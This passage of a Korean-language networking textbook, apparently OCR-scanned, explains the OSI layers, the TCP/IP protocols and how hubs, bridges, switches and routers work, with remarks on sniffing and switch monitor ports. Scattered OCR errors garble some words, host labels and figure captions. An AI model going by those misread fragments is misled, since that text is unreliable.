신체계 에서 혼돈되지 않음을 담보한다. 
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— 표현층 (expression layer ) 

표현층은 두 체 계사이 주고받는 정 보의 구문과 의 미 론에 대 해서 취 급한다. 

표현층은 자료가 체계에서 돌아가는 응용프로그람에 리용가능한 형태로 접수되는것을 
담보한다. 실례로 인터네트상에서 암호화된 통신을 리용하여 통신하고있다면 표현층은 이 
정보를 암호화 및 복호화할 책임을 진다.대부분의 웨브열람기들은 인터네트에서 금융업무 
를 수행하기 위하여 이리한 기술을 지원한다. 자료 및 언어번역도 이 준위에서 수행된다. 

— 응용층 (application layer ) 

응용층은 사용자나 쏘프트웨어 를 망에 접 근할수 있도륵 한다. 사용자대 면을 제 공하고 
전자우편，원격 파일접근과 전송，공유자료기지관리，그리고 다양한 분산정보봉사를 제공 
한다. 

응용층이라는 말은 이것이 사용자가 체계에서 돌리고있는 실제적인 프로그람을 서술 
하는것 이 아니므로 약간 오해를 줄수 있다. 이 층은 오히 려 망자원에로의 접근이 언제 요 
구되는가를 결정하는데 책임이 있는 층이다. 실례로 Microsoft Word 는 OSI 모형의 응용 
층에서 동작하지 않는다. 만일 한 사용자가 봉사기에 있는 자기의 홈등록부로부터 하나의 
문서를 검색하려 한다면 응용층망쏘프트웨어는 원격체계 에 그의 요구를 전달할 책 임을 가 
전다. 

4) OSI 모형의 동작 

우에서 언급한 층들이 어 떻게 함께 동작하는가를 보기 위하여 하나의 실례를 고찰하 
자. 문서처 리프로그람을 리용하여 원격봉사기 에 있는 자기 의 홈등록부로부터 파일 
resume.txt 를 검 색하려 한다고 가정 하자. 체 계 에서 돌아가는 망쏘프트웨어 는 다음과 
같이 반응할것이다. 

一 파일요청을 형식화하기 

응용층은 원격파일 체 계 로부터 정 보를 요청 하고있 다는것 을 검 출한다. 

그다음 resume.txt 가 있는 체계에로 가는 하나의 요청을 형식화한다. 이 요청을 만 
들면 응용층은 다음의 처 리를 위하여 그것을 표현층에 보낸다. 

표현층은 이 요청을 암호화할 필요가 있는가 또는 어떤 형식의 자료변환을 할것인가 
를 결정한다. 일단 이것이 결정되고 완성되면 표현층은 그것에 원격체계의 표현층을 통과 
하는데 필요한 어떤 정보들을 추가하고 그 파케트를 대화층에 로 보낸다. 

대 화층은 어 느 응용프로그람이 그 정 보를 요구하고있는가를 검 사하고 원격체 계 로부터 
의 어떤 봉사가 요청되고있는가를 확인한다. (파일접근) 대화층은 원격체계가 어떻게 그 요 
청 을 처 리 할것 인 가를 알고있 다는것 을 담보하기 위 해 그 요청 에 정 보를 첨 가한다. 다음에 전 
송층에 로 이 모든 정보들을 보낸다. 

전송층은 그것 이 원격체계와 믿음성 있는 련결을 가지고있다는것을 담보하여 정보들을 


임 으로 포장하기 시 작한다. 하나의 프레 임 이상이 요구된 다면 정 보는 쪼개 지 고 
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매 블로크에 순서번호가 배 당된다. 이 순서화된 정보묶음이 한번에 하나씩 망층으로 내 려 
간다. 

망층은 전송층으로부터 정보블로크들을 받고 망주소를 첨가한다. 이것은 자료련결층 
으로 내 려 가는 매 블로크에 대 하여 수행된다. 


표 케임미 리 부 


자 보 마 당 


프메입 M 피 斗 


피 보 련 접 충 



그림 1-25. 프레임에서 매 층의 정보의 위치 

자료련결층에서 블로크들은 개별적인 프레임들로 포장된다. 그림 1-25 에서 보는것처 
럼 매개의 이전 층들에서 보충된 모든 정보는(실제적인 파일요청도 함께) 이써네트프레임 
의 46~1500 byte 크기에 맞아야 한다. 자료련결층은 다음에 원천지 및 목적지 MAC 주소 
로 구성 된 프레 임 머 리부를 첨 가하고 이 정 보를 리 용하여(자료마당의 내 용에 따라) CRC 
꼬리 부를 만든다. 자료련결층은 다음에 망에 서 리용되 는 위 상구조규칙 에 따라 그 프레 임 
을 전송한다. 

물리 층은 원천지 로부터 목적지 에 로 정 보를 나르는 역 할을 한다. 물리층은 프러0에 따 
라 정 보를 가지 고있지 못하므로 자료련결 층으로부터 전송된 수자신호임 플스들을：^ 
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과시킨다. 물리층은 두 매체사이에 련결이 이루어지는 곳으로서 원격체계의 자료련결층에 
로 신호를 나른다. 

하여 를퓨터 는 자료요청 ( 《 나에 게 resume.txt 의 복사본을 보내 라.》 ) 을 성 과적 으로 형 
식화하고 그것을 원격체 계 에 전송한다. 이 점 에서 원격체 계는 류사하지 만 반대 방향인 과 
정 을 수행 한다. 

一 원격체계 에서 자료를 받기 

원격체 계의 자료련결층은 전송된 프레 임 을 읽어 들인다. 그것 은 머 리부의 목적지마당 
의 MAC 주소가 자기 의 것 이 라는것 을 알고 자기 가 이 요청 을 처 리 해 야 한다고 인정한다. 그 
프레임에 대한 CRC 검사를 진행하고 그 결과를 프레임꼬리부에 보관된 값과 비교한다. 이 
값이 일치하다면 자료련결층은 머 리부와 꼬리부를 벗겨버리고 그 자료련결층은 원천체계 
에 또 하나의 프레 임을 보낼것을 요구하는 요청 을 보낸다. 

원격체계의 망층은 올라온 정보를 분석한다. 목적지쏘프트웨어주소가 자기것임을 알 
게 된다. 이 분석 이 끝나면 망층은 이 준위와 관련된 정보를 제거하고 나머지를 전송층에 
보낸다. 

전송층은 그 정 보를 받고 분석한다. 만일 파케 트순서 화가 리 용되 였 다는것 을 발견하면 
자료가 다 수신될 때 까지 대 기한다. 만일 자료의 일부가 손실 되 였 다면 전송층은 순서 정 보 
를 리 용하여 원천체 계 에서 보낼 하나의 응답을 형성 하는데 잃어 진 자료토막을 다시 전송 
할것을 요구한다. 모든 자료가 수신되면 전송정보들을 벗겨내고 대화층에 그것을 올려보 
낸다. 

대화층은 정보를 받고 그것이 정당한 련결로부터 온것인가를 확인한다. 검사가 제대 
로 되면 대화층정보를 벗겨내고 그 요청을 표현층에 보낸다. 

표현증은 그 정 보를 받고 분석 하여 요구되 는 어 떤 변환 또는 부호화를 수행 한다. 변 
환이나 부호화가 끝나면 표현층정보를 벗겨내고 그 요청을 응용층에 올려보낸다. 

응용층은 그 체계에서 돌아가는 정확한 과정이 그 자료요청을 접수한다는것을 담보한 
다. 이것이 파일요청이므로 그것은 파일체계접근에 책임이 있는 어느 공정에 보내진다. 이 
공정은 요청된 파일을 읽고 그것을 응용층에 보낸다. 이 점에서 매개 층을 통하여 정보를 
보내는 전체 과정 이 반복된다. 

1.4.3. TCP / IP 통신규약 

TCP/IP 는 OSI 모형보다 먼저 개발되였다. 그러므로 TCP/IP 규약의 계층구조는 OSI 
모형의 계층구조와 정확하게 일치되지 않는다. TCP/IP 규약은 5 계층(물리층，자료련결층， 
망층，전송층，응용층)으로 구성되 여있다. 처음 4 계층은 OSI 모형의 4 계층과 일 치하는 물 
리적인 표준，망대면부와 망사이의 호상련결과 전송기능도 제공한다. 그러나 OSI 모형의 상 
위 3 계# 은 TCP/IP 에서 응용층 (application layer) 이 라는 하나의 계 층으로 표현된다. 

轉 
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TCP / IP 는 특정 기 능을 제 공하는 매 모둘들이 대 화식 으로 되 여있는 계 층구조를 가지 
는 규약이지만 모둘들이 반드시 서로 의존적이지는 않다. OSI 모형이 매개 계층에 속해있 
는 기능을 나타내는 반면에 TCP / IP 규약의 계층은 체계의 요구에 따라 혼합되고 대응되 
는 상대 적 으로 독립 적 인 규약이 포함되 여 있 다. 계 층적 인 구조 ( hirachical ) 라는 용어 는 각 
상위규약이 하나 또는 그 이 상의 하위규약에 의하여 지 원됨 을 나타낸 다. 

전송계 층에 는 TCP / IP 를 규정 하는 2개 의 규약인 TCP (Transmission Control Protocol ) 
와 UDPOJser Datagram Protocol ) 규약이 있다. 망층에는 자료이동을 지원하는 규약이 몇 
가지 가 있지 만 TCP / IP 를 규정하는 주요규약은 IP(Internet Protocol ) 이 다. 

1) 물리층과 자료련결층 

물리 층과 자료련결층에서 TCP / IP 는 특정한 규약을 규정하지 않고 앞에서 설명한 모 
든 표준들과 기 술적 인 규약들을 지 원 한다. 망형 태 는 LAN (Local Area Network ), 또는 
WAN (Wide Area Network ) 이 될 수 있 다. 

2) 망층 

망층에서 (정확하게 말하면 망사이련결층) TCP / IP 는 인터네트규약 ( IP ) 을 지원한다. 

IP 에 는 4개 의 지 원규약 ( ARP , RARP , ICMP , IGMP ) 이 포함된 다. 

一 인터네트규약 ( IP ) 

인 터네 트규약은 TCP / IP 규약에 서 사용하는 전송방법 을 제 공한다. 이 규약은 믿 음성 
이 없는 비 련결형 규약으로서 최 선의 노력 으로 제 공하는 봉사이 다. 최 선의 노력 ( best - effort ) 
이 란 IP 가 오유검 사나 추적 을 제 공하지 않는다는것 을 의 미한다. IP 는 계 층의 믿 음성 이 없음 
을 가정하고 목적지까지 전송이 제대로 이루어지도록 최선을 다하지만 완전한 담보는 없다. 

IP 는 개 별적 으로 전송되 는 데 이 터 그램 ( datagram ) 이 라는 파케 트형 태 로 자료를 전송 
한다. 데 이터그램은 서로 다른 경로로 전달될수 있으므로 순서대로 도착하지 않거나 중복 
되여 도착할수 있다. IP 는 경로를 기록하지 않고 일단 목적지에 도착한 데이터그램을 재 
전송하는 기능도 제공하지 않는다. 

이리한 IP 의 제한된 기능을 약점이라고 할수도 있으나 IP 는 사용자가 주어진 응용에 
필요한 기능을 자유롭게 추가할수 있는 전송기능을 제공함으로써 최대 한의 효률성을 보장 
한다. 

一 주소변환규약 ( ARP ) 

주소변환규약 (Address Resolution Protocol ) 은 IP 주소를 물리 적 인 주소로 변환해 준다. 
LAN 과 같은 물리 적 인 망에 련결된 매 개 장치 는 망대 면부카드 ( NIC ) 의 물리주소 혹은 국 
부주소에 의해 구분된 다. ARP 는 인 터네 트주소를 알고있 을 때 국의 물리주소를 찾는데 사 
용된다. 
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一 역주소변환규약 ( RARP ) 

역 주소변환규약 (Reverse Address Resoution Protocol : RARP ) 은 호스트의 물리 주소 
를 알고있을 때 인 터 네 트주소를 알아내 는데，그리 고 콤퓨터 가 망에 처 음 련결될 때 또는 디 
스크없는 콤퓨터가 기동할 때 사용된다. 

— 인터네트조종통보문규약 ( ICMP ) 

인 터 네 트조종통보규약 (Internet Control Message Protocol : ICMP ) 은 송신자에 게 데 
이터그램 의 문제 점 을 알려 주기 위해 사용하는 규약이 다. ICMP 는 조회 와 오유보고통보를 
보낸다. 

— 인터네트그툽통보문규약 ( IGMP ) 

인 터 네 트그룹통보문규약 (Internet Group Message Protocol : IGMP ) 은 수신자그룹에 
게 통보를 동시에 전송하는데 사용된다. 

3) 전송층 

TCP / IP 에서 전송계층은 2개의 규약 ( TCP , UDP ) 을 가전다. IP 는 호스트대호스트규 
약 ( host - to-host protocol ) 으로서 파케 트를 하나의 물리 적 인 장치 에서 다른 물리 적 인 장치 
로 전달할수 있다는것을 의 미 한다. UDP 와 TCP 는 한 프로쎄스(실행 중인 프로그람)에서 다 
른 프로쎄스에 로 통보를 전달하는데 대 한 책 임을 가지는 전송준위 규약 (transport level 
protocol ) 이 다 . 


一 사용자데 이 터그램 규약 ( UDP ) 

사용자데 이 터 그램 규약 (User Datagram Protocol ; UDP ) 은 표준 TCP / IP 전송규약보다 
단순하다. 이것 은 포구주소，검 사합오유조종，상위계 층으로부터 받은 자료길 이정 보만 추 
가한 프로쎄 스대프로쎄 스규약이 다. 

一 전송조종규약 ( TCP ) 

전송조종규약 (Transmission Control Protoml ; TCP ) 은 응용에 대 한 모든 전송계층봉 
사를 제공한다. TCP 는 믿음성 있는 흐름 ( stream ) 전송규약이다. 여기서 흐름이란 용어는 련 
결중심 을 의 미한다. 자료를 전송하기 전에 량말단사이 에 련결을 설정해 야 한다. 

매 전송의 송신말단에서 TCP 는 자료흐름을 토막 ( segment ) 이 라는 작은 단위 로 나눈 
다. 매 개의 토막은 확인응답번호와 함께 수신후에 순서를 맟추기 위한 순서번호를 포함하 
고있다. 토막은 IP 데이터그램으로 교갑화되여 인터네트를 통하여 전달된다. 수신말단에 
서 TCP 는 수신되 는 매 데 이 터 그램 을 수집하여 순서번 호에 따라 맟춘다. 

一 응용계층 

TCP / IP 에서 응용계층은 OSI 모형의 대화，표현，그리 고 응용계 층을 합친것과 갈다. 
이 계^에는 많은 규약이 정의되 여있다. 

轉 
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1.4.4. 주요망련결하드웨어 

지금 자기의 망하부구조를 계획할 때 구할수 있는 망제품은 매우 많다. 콤퓨터체계를 
망에 련결하여 망자료흐름을 조종하기 위 하여 위상구조를 확장하기 위 한 장치들이 있다. 실 
례로 하나의 사무실를퓨터를 망에 련결하기 위하여서는 망기판이 있어야 한다. 

이러한 많은 장치들이 정확히 리용된다면 망의 보안을 개선하는데도 도움이 될수 있다. 

1) 반복기 ( Repeater ) 

반복기는 간단한 두포구신호증폭기 이 다. 이것들은 모선형위상구조에서 하나의 케블로 
나갈수 있는 최 대거 리를 늘이 기 위하여 리용된다. 신호의 세 기는 그것 이 도선을 따라 전 
파되 는데 따라 보강된 다. 반복기 는 한 포구로부터 수자식 신호를 받아서 그것 을 증폭하여 다 
른쪽 포구로 전송한다. 

반복기 는 전형 적 인 가정 용립 체 증폭기 와 같이 CD 나 테프로부터 받은 신호를 증폭하여 
그것을 고성기로 내보낸다. 

반복기는 자료의 질을 식별하지 않고 그것들을 그대로 증폭하는데 이때 수신한 신 
호는 좋은 자료프레 임 이 거 나 나쁜 자료프레 임 혹은 배 경잡음일 수도 있다. 

반복기는 자료토막화를 하지 않기때문에 피동적 인 증폭기로 볼수 있다. 

2) 집 선기 ( Hub ) 

물리 적 으로 집선기는 여 러개의 RJ 45 접속구가 붙어 있는 통이 다. 매 개 접속구는 RJ 45 
접속두를 붙인 하나의 꼬임쌍선케블을 꽂도륵 설계되였다. 그러면 이 꼬임쌍선케블은 하 
나의 봉사기 또는 작업기 를 집 선기 에 련결 하는데 리 용된 다. 

집선기 는 본질에 있어서 별형위상구조에서 꼬임쌍선케 블을 지 원하는 여 러포구반복기 
이 다. 매 마디점들은 집선기와 통신하며 집선기는 그 신호들을 증폭하고 그것들을 매개 포 
구들에로(전송하는 체계도 포함하여) 전송한다. 반복기와 마찬가지로 집선기도 전기적준 
위에서 동작한다. 집선기는 자료흐름조종을 제공하지 않으며 기능적으로 반복기와 같다. 

전통적 인 집 선기 의 한가지 변종은 무선집 선기 이다. 이 집 선기 들은 꼬임 쌍선대신에 무 
선전송을 리용하는데 무선망대면카드 ( NIC ) 를 가진 를퓨터들이 이 집선기를 통하여 서로 통 
신하게 된 다 . 보안문제 와 관련 하여 서 는 대 부분의 무선집 선기 제 작자들은 무선체 계 에 서 기 
본적으로 암호를 리용하고있다. 

3) 망다리 ( Bridge ) 

망다리는 반복기와 비슷하게 생겼는데 망의 두개의 분리된 부분에 속하는 두개의 망 
접 속구를 가지 는 작은 통이 다. 망다리는 반복기의 기 능(신호증폭)도 수행 하지 만 사실상 자 
료프레 임을 취급하는것 이 큰 우점 이 다. 그림 1-26 에 보여준것처 럼 일반적 인 망다리는 지 
시 등을 제 외 하고는 반복기 와 거 의 비 슷하게 생 겼다. 《 Forward } 표시 등은 망다리 가 한 중 
돌령역 으로부터 다른 곳으로 자료흐름을 통과시 킬 때 불이 켜 진 다. 

망다리 는 매 자료프레 임 에서 머 리부정보를 리용하여 원천 및 목적지 MAC 주소를 감 
시한다. 
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망다 러 

그림 1-26. 일반적인 망다리 

원천주소로부터 망다리는 그 망체계가 어디에 위치하고 있는가를 알게 된다. 망다리 
는 하나의 표를 만드는데 자기 의 매 포구에 의하여 어 느 MAC 주소로 직 접 접 근가능한가 
를 목록으로 만든다. 그리 고 이 정 보를 리 용하여 망에 서 자료와 흐름을 조절 한다. 하나의 
실례를 보자. 

그림 1-27 의 망을 고찰하자. 의뢰기 C 1 는 자료를 봉사기 S 1 에게 보내 려 고 한다. 망 
우의 매개가 다 망을 감시하여야 하므로 C 1 는 먼저 다른 국들이 전송을 하는가를 듣는다. 
도선이 비였다면 C 1 는 하나의 자료프레 임을 전송한다. 




그림 1-27. 이로부터 봉사기引에로 자료전송 
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S 1 의 MAC 주소는 프레 임머 리부의 목적지마당에 들어있다. 

망다리도 또한 자료흐름을 감시 하고 있다가 C 1 의 프레 임의 머 리부에서 목적지주소를 
본다. 망다리는 MAC 주소 00 C 08 BE 0052( S 1) 를 가지는 체계 가 어느 포구에 련결되 여있 
는지 모르므로 그 신호를 증폭하여 포구 묘로 재전송한다. 지금 망다리의 기능은 반복기 
와 류사하다. 그러 나 약간의 기 능을 더 수행하는데 C 1 가 포구 A 에 붙어 있 다는것 을 알고 
그의 MAC 주소를 가지는 하나의 표항목을 만든다. 

그림 1-28 에서 보여 준것처럼 S 1 가 C 1 의 요청에 응답할 때 망다리는 자료프레 임에 
서 목적지주소를 또 보게 될것이다. 그러나 이때 그는 그것을 자기의 표와 맞추어보고 C 1 
가 포구 A 에 붙어 있다는것을 알게 된다. 그는 C 1 가 이 정 보를 직 접 받을수 있다는것을 알 
고있으므로 그 프레 임을 없애고 포구 B 로부터 전송되지 않도륵 막는다. 망다리는 또한 S 1 
에 대 한 새로운 표항목을 만들어 그 MAC 주소가 포구 A 에 있는것으로 기록한다. 

망다리가 매 국의 MAC 주소를 기억하고있는한 C 1 와 S 1 사이의 모든 통신은 C 2 과 S 2 
과는 차단될것 이 다. 자료흐름의 격 리는 망다리의 량쪽에 있는 체계들이 준비되 여있는 대 
역너 비를 2중으로 쓰면서 효과적 으로 동시 에 대화를 진행 한다는것을 의 미하므로 매우 강 
력한 기능으로 된다. 망다리는 그 량쪽이 서로 련결되지 않은것처럼 통신이 격리되도록 담 
보한다. 국들은 망다리의 다른쪽에서의 전송을 볼수 없으므로 자기들의 망이 현재 비여있 
다고 가정하고 자기들의 자료를 전송하게 된다. 
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그림 1-28. 이의 틍보문에 대한 引의 응답 
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매개 체계는 자기와 같은 망토막에 있는 체계들과만 대역너비를 가지고 통신하게 된 
다. 이것은 그 토막밖에서는 충돌이 생길수 없다는것을 의미한다. 그러므로 이 토막들을 그 
림 1-29 에 보여 준것 처 럼 충돌령역 이 라고 부르며 망다리 의 매 측에 서 의 하나의 포구는 매 
충돌령역의 부분으로 된다. 그것은 그의 매 포구들이 그것에 직접 접속된 체계들과 대역 
너 비 를 가지 고 다틀것 이 기 때 문이 다. 망다리 는 매 충돌령 역 안에 서 통신량을 격 리 시 키 므로 분 
리 된 체 계 들이 중돌할수는 없 다. 그 효과는 잠재 적 인 대 역 너 비 를 2배 로 하는것 으로 나타 
난다. 
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그림 1-29. 두개의 분리된 충돌령역 


망을 두개의 충돌령역으로 분리하는것은 망보안을 강화하는것으로 된다. 실례로 봉사 
기 S 2 이 정지되였다고 하자. 공격자는 이 체계에 높은 급의 접근을 시도하고 중요한 정 
보들을 얻 기 위하여 망활동을 포착하기 시 작한다. 

우의 망설계가 주어졌다고 하면 S 1 와 C 1 는 비교적 안전하게 대화를 할수 있다. S 2 
의 충돌령역으로 갈수 있는 유일한 자료흐름은 방송자료뿐이다. 

그러면 자료흐름이 망다리를 통과할 때 무슨일이 생기게 되는가? 언급된바와 같이 망 
다리는 체계의 위치를 모를 때 그 파케트를 그대로 통과시킨다. 일단 망다리는 그 체계가 
乂 W 성，다른 포구에 위 치 하고 있다는것을 알면 그 프레 임을 요구하는대로 통과시 킨다. 
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실례로 만일 C 1 가 C 2 과 통신하기 시작한다면 이 자료는 망다리를 지나서 S 2 과 같은 
충돌구역 으로 전송될것 이 다. 이것은 S 2 이 이 자료를 받을수 있다는것 을 의 미한다. 망다 
리는 C 1 와 야의 통신은 안전하게 보장하였지만 C 1 가 C 2 과 통신하기 시작할 때에는 추 
가적 인 보안을 제공하지 못한다. 

이 대화들을 둘다 안전하게 하기 위하여서는 망다리가 매개 체계에 하나의 포구를 제 
공할수 있어야 한다. 이러한 형식의 기능은 교환기라고 부르는 장치에 의하여 제공된다. 


4) 교환기 ( Switch ) 

교환기는 집선기와 망다리기술의 결합이라고 볼수 있다. 이것들은 겉으로 보기에는 집 
선기 와 류사한데 망체계들을 접속하기 위한 여 러 개의 RJ 45 접속구들을 가지 고있다. 그러 
나 집선기와 같은 피동적 인 증폭기 가 아니 라 교환기는 매 포구에 작은 망다리를 가지 고있 
는것 처 럼 동작한다. 교환기는 매 포구에 불은 MAC 주소들의 위 치를 알고있으며 일정 한 주 
소에로 정해진 자료흐름을 그것이 속한 포구에로만 보낸다. 





국 3 

그림 1-30. 틍신하려고 하는 3개의 국과 3개의 봉사기들 


그림 1-30 은 매개 장치가 자기의 전용포구에 접속된 교환기에 기초한 환경을 보여준 
다. 교환기 는 하나의 프레 임 전송이 발생하면(망다리 와 같이 ) 그 국의 MAC 식 별 자를 주시 
한다. 이것이 이미 진행되였다고 가정하면 정확히 같은 순간에 국1은 봉사기1에 자료를 보 
내 려 하고 국2는 봉사기 2에 자료를 보내 려 하며 국3은 봉사기 3에 자료를 보내 려 한다는 
것을 알게 될것 이다. 
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이 리 한 상황과 관련한 몇 가지 흥미 있는것들이 있다. 첫째 로는 매 도선의 동작이 그 교 
환기와 그것에 붙은 그 국만을 포함한다는것이다. 이것은 매개 충돌령역이 이 두 장치만 
에로 제한되였다는것을 의미한다. 왜냐하면 교환기의 매개 포구는 망다리와 같이 동작하 
기때문이다. 작업기와 봉사기가 얻을수 있는 유일한 자료흐름은 특별히 그들에게로 보내 
진 프레 임과 방송주소로 보낸것들뿐이 다. 결과 3개의 모든 국들은 매우 작은 망자료흐름 
을 보게 되며 즉시 로 전송할수 있게 된다. 이것은 잠재적 인 대 역 너 비를 크게 증가시키는 좋 
은 특성으로 된다. 실례에서 이것이 10 Mbps 위상구조라면 결과적인 처리량은 3배로 증가 
할것 이 다. 이것은 3개의 체계 모임전체 가 교환기 에 의하여 격 리되 여있으므로 동시 에 대 화 
를 할수 있기때문이다. 기술적으로는 10 Mbps 이써네트이지만 잠재적인 처리량은 30 Mbps 
로 증가하였다. 

성능을 크게 높이는 한편 보안도 강화되게 된다. 이 체계들중 어 느 하나가 손상되면 감 
시될수 있는 유일한 대화는 손상된 체계와의 대화뿐이다. 실례로 만일 공격자가 봉사기2 
에 로의 접 근을 얻 었 다면 그는 봉사기1 또는 봉사기 3과의 통신대 화는 감시할수 없을것 이 다. 

이것은 감시하는 장치가 자기의 충돌령역안에서 전송하는 자료흐름만을 볼수 있기때 
문이 다. 봉사기2의 충돌령역 은 그 자체 와 그것 이 접 속된 교환기 포구로 구성 되 여있으므로 
교환기 는 다른 봉사기 들과 진행 되 는 통신대화로부터 봉사기 2로 격 리하는 작업 을 효과적 
으로 수행한다. 

이것은 훌륭한 보안특성 이지만 망에 대 한 합법 적 인 감시 는 좀 시끄러 운 일로 된다. 이 
것으로 하여 많은 교환기들은 감시포구를 가지고있다. 

감시포구는 그 교환기의 하나의 포구로서 하나 또는 몇개의 포구들에 로 전송된 모든 자 
료들의 복사들을 수신하도록 구성될수 있다. 실례로 자기의 분석기를 교환기의 어느 한 감 
시 포구에 꽂고 그 장치 가 포구3에 로의 모든 자료흐름을 듣게 끔 구성할수 있 다. 만일 포 
구3이 자기의 봉사기들중의 하나라면 지금 이 체계 에 로 들어오고나가는 모든 자료흐름을 
분석할수 있 다. 

이 것은 또한 잠재적 인 보안구멍일수도 있다. 만일 공격 자가 그 교환기에 로의 관리접 
근을 얻 을수 있 다면 ( telnet , HTTP , SNMP 또는 조종판도구를 통하여 ) 그는 그 교환기 
에 접속된 임의의 체계 또는 그를 통하여 통신하는 임의의 체계를 감시하는데서 자유로운 
통제 권을 가지 게 될것 이 다. 실례 에서 보면 만일 공격 자가 봉사기2와 교환기 자체 에 접 근 
할수 있다면 모든 망통신을 완전히 감시할수 있게 된다. 

참고로 언급하면 망다리，교환기 그리고 류사한 다른 망장치들은 주로 보안을 개선하 
기 위 해서 가 아니 라 망성능을 개선하기 위하여 설계된것들이 다. 보안이 강화되는것은 두 
번째의 유익한 점이다. 교환기는 보안원칙을 좋게 하여주지만 그것이 보안원칙을 실현하 
는데서 핵심적인 장치로 되여서는 안된다. 

교환은 가상국부망 ( VLAN ) 이 라고 하는 새 로운 기 술을 도입한다. 교환기 에 서 돌아가 
:웨어는 지리적위치에 의해서가 아니라 작업집단에 의하여 련결된 (VLAN 집단이 
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라고 부르는) 체계들의 련결성파라메터들을 설정할수 있게 한다. 교환기의 관리자는 포구 
전송을 론리적으로 조직하여 련결성 이 매 사용자의 요구에 따라 집 단을 구성할수 있도륵 할 
수 있다. 《가상적 인》부분은 이 VLAN 집 단들이 여 러개의 물리 적망토막들과 여 러개의 교 
환기 들을 포함할수 있 다는것 이 다. 일정한 집 단의 사람들이 PC 에 접 속된 모든 교환기 포구 
들을 같은 VLAN 집 단에 배 당함으로써 하나의 가상적 인 망을 만들수 있다. 


5) 경 로기 ( Router ) 

경로기는 통신규약과 망정보에 기초하여 프레임의 내용을 어떻게 취급할것인가를 결정 
하는 여러포구장치이다. 이것이 무엇을 의미하는가를 리해하기 위하여서는 먼저 통신규약 
이란 무엇이며 그것이 어떻게 동작하는가를 보아야 한다. 

지금까지는 망장치들에 배 당된 MAC 주소를 리용하여 통신하고있었다. 체계는 이 주 
소를 리용하여 다른 체계들과 접촉하고 요구되는대로 정보를 전송하였다. 

그러면 서로 통신하려는 2 000개의 체계를 가지고있다고 가정하자. 이것은 하나의 이 
써네트망에서 대역너비를 가지고 서로 다투는 2 000개의 체계를 가지고있는것으로 된다. 
교환기를 사용한다고 하여도 방송프레임들이 많아서 망성능은 크게 떨어지게 되며 더 많 
은 체계들을 추가할수 없게 된다. 이 런 문제로 하여 IP 와 IPX 와 같은 통신규약들이 나타 
나게 된다. 

경 로기 는 모든 알려진 망들에 대 한 표를 가지 고있는 규약을 리해하는 장치 이 다. 경 로 
기는 이 표를 리용하여 정보를 최종목적지까지 보내도록 한다. 경로조종되는 망이 어떻게 
동작하는가를 알기 위하여 한가지 실례 를 보기 로 하자. 

그림 1-31 에서 보는것처럼 체계 묘가 체계 표에 정보를 전송하려 한다고 가정하자. 
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그림 1-31. 경로조종망의 실례 
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체계 묘는 자기의 망주소를 체계 F 의것과 비교하는것부터 시작할것 이 다. 망주소가 같 
으면 체계 묘는 그 체계와 같은 국부망에 있다고 가정하고 정보를 직접 전송하려고 시도 
한다. 만일 망주소가 다르다면 체계 묘는 자기의 경로조종표를 참고한다. 그것 이 망3에 대 
한 항목을 가지고있지 않다면 그는 자기의 기정경로기에로 돌아가는데 그것은 이 경우에 R 1 
이 다. 정 보를 R 1 에 게 전달하기 위하여 체 계 묘는 R 1 의 MAC 주소를 알기 위하여 AHP 파 
케트를 전송한다. 

다음에 체계 묘는 그 자료에 체계 표에 대한 망규약전달정보를 추가하여 R 1 의 MAC 
주소를 목적 지 로 리용하는 하나의 프레 임 을 만든다. R 1 가 그 프레 임 을 받으면 CRC 검 
사를 진행하여 자료의 완전성 을 확인한다. 프레 임 이 검 사되 면 R 1 는 머 리 부와 꼬리 부를 완 
전히 떼낸다. 다음에 R 1 는 그 프레임에 들어있는 목적지망주소(이 경우에 망 3) 를 분석하 
여 그것이 이 망에 국부적으로 련결되였는가를 알아낸다. R 1 가 망3에 직접 련결되지 않 
았으므로 그는 자기의 경로조종표를 참고하여 거기로 가는 가장 좋은 경로를 찾아낸다. 다 
음에 R 1 는 R 2 이 망3에 도달할수 있다는것을 발견한다. 

R 1 는 이 제 R 2 이 리 용하는 국부 MAC 주소를 알기 위하여 ARP 파케 트를 전송한다. 그 
리고 원천마당에 자기의 MAC 주소，목적지마당에 R 2 의 MAC 주소를 가지는 머리부를 만 
들어 그 자료파케트의 새로운 프레 임을 만들어 낸다. 마지막으로 새로운 CRC 값을 꼬리 
부에 덧붙인다. 

경로기들은 망토막의 경계에 배치된다. CRC 검사는 나쁜 프레임이 그 망을 통하여 전 
파되 지 않는다는것 을 담보하기 위하여 진행한다. 머 리 부정 보는 그것 이 망1에 서 만 쓸수 있 
기 때 문에 제 거한다. R 1 가 그 프레 임 을 망 2로 전송하려 고할 때 원래 의 원천 또는 목적 지 
MAC 주소들은 의미를 가지지 않는다. 그러므로 R 1 는 이 값들을 망2에서 쓸수 있는것들 
로 바꾸어 야 한다. 

머 리 부의 대 부분 (14 byte 중 12 byte ) 이 교체 되 여 야 하므로 그 머 리 부를 완전 히 제 거 하 
고 기 억 기 로부터 그것 을 다시 만드는것 이 더 쉽다. 꼬리 부를 제 거하면 원천 및 목적 지 MAC 
주소가 변화되였기때문에 원래의 CRC 값은 더는 의미가 없게 된다. 그러므로 경로기는 그 
것을 제거하고 새것을 만들어야 한다. 

R 1 가 하나의 새로운 프레 임을 만들어 망2로 전송하면 그것은 R 2 에서 수신될것 이 다. 
R 2 은 그 프레 임 을 받고 R 1 와 류사한 방법 으로 그것 을 처 리한다. R 2 은 CRC 를 검 사하여 
여기서 머리부와 꼬리부를 제거한다. 이 시점에서 R 2 은 표와 규약적련결을 가지고 있다는 
것을 알게 된다. 하여 R 2 은 하나의 새로운 프레 임을 만들어서 표를 참고하지 않고 그 프 
레임을 직접 배 달한다. 

위 상구조적자료흐름을 취 급하는 망다리 와는 달리 경 로기 는 위 상구조와 리용되 는 통신 
규약을 둘다 지원할수 있도륵 설계되여야 한다. 

경 로기 는 망에서 의 통신량의 흐름을 조종할수 있는 강력 한 도구로 될수 있다. 만일 IPX 
용쓰는 망토막을 가지 고있는데 IP 만이 기 관의 중추망에 서 리용하도록 승인되 여있 
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다면 경 로기 에 ip 만을 지 원하게 해주면 된다. 그러면 그 경로기는 수신하는 모든 IPX 자 
료흐름을 무시할것 이 다. 

경로기의 중요한 특징은 방송을 막는 능력이다. 경로기의 다른쪽의 임의의 점은 새로 
운 망이므로 이 프레 임들을 막을수 있다. 

대부분의 경로기들은 또한 일정한 자료흐름을 려과하는 능력을 가지고있는데 자료흐 
름을 조종하기 위 하여 정적파케트려과를 리용한다. 

망다리 (교환기)와 경로기를 비교해보자. 

표 1-4 는 우에서 언급한 정보들을 개괄한것이다. 여기서는 자료련결층에서의 통신량 
